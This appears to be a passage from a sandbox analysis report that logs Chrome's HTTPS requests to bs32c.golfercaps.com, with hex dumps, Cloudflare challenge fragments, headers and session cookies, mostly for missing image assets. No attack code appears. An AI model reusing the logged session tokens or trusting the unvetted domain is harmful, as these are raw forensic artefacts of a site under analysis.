                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 5a 39 31 43 79 65 43 54 46 72 32 6f 71 64 39 36 6d 37 30 32 5f 72 4f 77 45 7a 6b 2e 65 6a 37 56 4a 38 6d 56 5f 5f 32 43 6b 54 64 59 61 55 36 52 77 75 71 5a 51 63 79 57 54 73 6b 74 42 4b 45 35 6d 37 62 61 5a 4a 50 79 44 52 32 43 38 76 44 42 2e 42 32 57 64 70 62 75 43 33 54 41 53 51 4c 38 78 71 7a 50 6a 4a 65 47 38 46 4f 50 6a 78 33 79 79 2e 75 33 74 7a 6b 6c 5f 4b 59 31 72 47 75 62 41 2e 48 67 54 73 31 7a 47 63 38 54 34 76 42 57 35 42 74 39 69 5a 37 63 58 47 52 4c 6b 49 6c 4e 51 5a 68 46 34 6d 62 37 34 45 56 53 63 64 61 56 4f 65 35 49 34 57 4f 70 4f 50 6e 42 33 75 71 6a 32 35 31 2e 67 5f 7a 69 41 73 63 78 43 4e 76 72 6d 6e 5f 73 47 56 76 4b 71 57 56 42 6d 74 32 47 35 50 6f 61 68 61 70 53 52 66 31 74 6c 77 59 50 6a 2e 54 54 6e 78 36 46 79 70 61 69 6d 77 68
                                                                  Data Ascii: Z91CyeCTFr2oqd96m702_rOwEzk.ej7VJ8mV__2CkTdYaU6RwuqZQcyWTsktBKE5m7baZJPyDR2C8vDB.B2WdpbuC3TASQL8xqzPjJeG8FOPjx3yy.u3tzkl_KY1rGubA.HgTs1zGc8T4vBW5Bt9iZ7cXGRLkIlNQZhF4mb74EVScdaVOe5I4WOpOPnB3uqj251.g_ziAscxCNvrmn_sGVvKqWVBmt2G5PoahapSRf1tlwYPj.TTnx6Fypaimwh
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 32 54 32 46 31 58 72 55 64 4a 62 44 37 31 52 57 44 31 39 75 78 34 4f 38 6a 5a 6e 49 30 39 63 65 59 62 38 50 49 4d 4b 7a 46 42 69 6c 4a 39 37 78 68 4e 68 51 42 52 32 4e 74 61 51 4c 64 75 59 42 67 44 36 76 44 34 63 7a 74 58 4b 33 70 47 4c 43 67 38 5f 39 4c 70 39 71 6a 46 59 5f 38 38 48 41 35 35 41 50 54 45 65 73 64 76 31 47 6e 5f 32 4c 6f 5a 45 38 6e 38 4d 6c 62 58 4a 68 43 78 5f 56 67 6c 7a 43 51 34 39 68 34 78 70 4e 41 57 6a 75 66 68 38 49 36 70 4c 54 4d 5f 47 70 4a 45 7a 72 51 30 6c 6d 36 76 69 56 70 48 38 38 75 34 75 49 77 73 4c 72 6b 71 77 71 73 45 7a 4d 72 48 4a 59 73 46 54 46 5f 75 67 6c 41 4a 53 7a 37 58 38 6b 6e 6b 74 56 5f 66 64 75 36 52 55 4f 6c 71 38 72 66 6f 4e 6f 64 67 44 43 65 49 4b 32 35 35 43 70 4b 57 41 4c 6e 4d 6a 54 77 42 53 33 33 69 61
                                                                  Data Ascii: 2T2F1XrUdJbD71RWD19ux4O8jZnI09ceYb8PIMKzFBilJ97xhNhQBR2NtaQLduYBgD6vD4cztXK3pGLCg8_9Lp9qjFY_88HA55APTEesdv1Gn_2LoZE8n8MlbXJhCx_VglzCQ49h4xpNAWjufh8I6pLTM_GpJEzrQ0lm6viVpH88u4uIwsLrkqwqsEzMrHJYsFTF_uglAJSz7X8knktV_fdu6RUOlq8rfoNodgDCeIK255CpKWALnMjTwBS33ia
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 61 48 61 44 7a 44 6b 6b 69 50 50 49 6a 4f 33 41 52 6d 52 7a 7a 69 47 6b 55 4c 4c 33 6e 43 47 58 52 52 5a 6a 32 4b 46 7a 4c 6f 77 52 51 79 78 37 51 64 39 46 6b 31 42 6c 5f 5a 48 76 31 70 5a 52 62 74 54 53 67 6b 79 49 56 65 75 45 52 66 67 65 4c 69 73 6b 69 79 44 31 2e 6d 56 33 58 31 38 47 37 30 33 76 56 78 70 76 41 51 5a 75 4e 51 56 37 37 6e 44 5f 58 54 75 73 53 6d 48 68 62 33 7a 30 6d 56 44 55 30 35 6f 68 64 6d 58 6c 71 78 69 68 30 73 4c 59 63 6e 54 4f 5a 71 72 74 5a 55 70 45 6d 59 35 42 4b 7a 71 78 68 6b 66 4d 4a 34 49 31 53 53 6b 67 31 5f 45 75 58 33 36 5f 74 76 36 52 50 32 57 6f 62 65 77 34 6b 34 55 46 36 43 62 54 46 5a 35 4d 61 55 30 76 74 43 71 6b 61 46 61 59 36 7a 4e 36 6b 70 30 37 64 41 38 64 67 33 6d 72 4b 6b 73 53 67 4a 54 30 49 33 43 4c 4b 46 34
                                                                  Data Ascii: aHaDzDkkiPPIjO3ARmRzziGkULL3nCGXRRZj2KFzLowRQyx7Qd9Fk1Bl_ZHv1pZRbtTSgkyIVeuERfgeLiskiyD1.mV3X18G703vVxpvAQZuNQV77nD_XTusSmHhb3z0mVDU05ohdmXlqxih0sLYcnTOZqrtZUpEmY5BKzqxhkfMJ4I1SSkg1_EuX36_tv6RP2Wobew4k4UF6CbTFZ5MaU0vtCqkaFaY6zN6kp07dA8dg3mrKksSgJT0I3CLKF4
                                                                  2024-12-30 21:42:40 UTC640INData Raw: 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c
                                                                  Data Ascii: & location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  56192.168.2.458517188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1451OUTGET /vfd23ced/assets/icon_check_not_checked_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC841INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Duv1BwLpCNN3uAFWCurn7MwA2C1W8o32BBXZvjj7cAXkZfyYseOI9k9eurGsKvGjJ4iKFJbsVSPEw1YHg9PFi%2FnZG0EjSsNwSYNUXjPNHIUR%2FPxx0zf6fQaTAnPyO%2BCYjoygxhSRvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53378795241f2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2290&min_rtt=1803&rtt_var=1024&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2051&delivery_rate=1619523&cwnd=231&unsent_bytes=0&cid=c9da5f161fac6eea&ts=254&x=0"
                                                                  2024-12-30 21:42:40 UTC321INData Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                  Data Ascii: 1
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  57192.168.2.458518188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1435OUTGET /vfd23ced/assets/icon_check_all.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC838INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KuAvvPWCC3V1DtO1TqEH4BLOMPgVc1u9kVU2ZQstScYGGvYAIvLe5sNOrBv3k6zBeem0YtXFyjis9yRjHAP8VYmtwzaswD37HnTEoxH9iicLR0aGACl17v9GIy%2FYbJFvnS81u%2BHMFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53378de974393-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1570&rtt_var=615&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2035&delivery_rate=1742243&cwnd=201&unsent_bytes=0&cid=9d33f36926953eeb&ts=270&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  58192.168.2.458519188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1443OUTGET /vfd23ced/assets/icon_check_all_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC844INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=snEQ7C1MbvXUmZAnZ920AUtLoh7aNy0%2BRZZV8QrkbBfdXzvMF33kJR4%2FqQx8K3W02q8xtHNdAy2%2FDvUmz%2FcBtqkOaktDQSg2w1j5lBVxS6QPUPGRTRibfq7G3yw8iWzFLB%2FupM2U7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53378dd207c6f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1984&rtt_var=779&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2043&delivery_rate=1471774&cwnd=212&unsent_bytes=0&cid=258df5e19d7a6de8&ts=271&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  59192.168.2.458521188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1448OUTGET /vfd23ced/assets/icon_check_all_sthischecked.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:41 UTC842INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:41 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a5VAQcZrHeoDD0oC4NdO3CFh%2FiTfSdd9X6n6lXIb4WA5Ir1ET05fmAGrKaT7IUsgtR%2Fdw5zBD8LWzKQ0donG%2FJtJV2fuChxCoYBRBlG73U0B6NyomsH%2FkyPvhBQgiS4qUbwoc3tTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533793b884225-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1739&rtt_var=657&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2048&delivery_rate=1660978&cwnd=235&unsent_bytes=0&cid=289f69bbfbb3a6dc&ts=970&x=0"
                                                                  2024-12-30 21:42:41 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  60192.168.2.458520188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1455OUTGET /vfd23ced/assets/icon_check_sthischeckedall_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
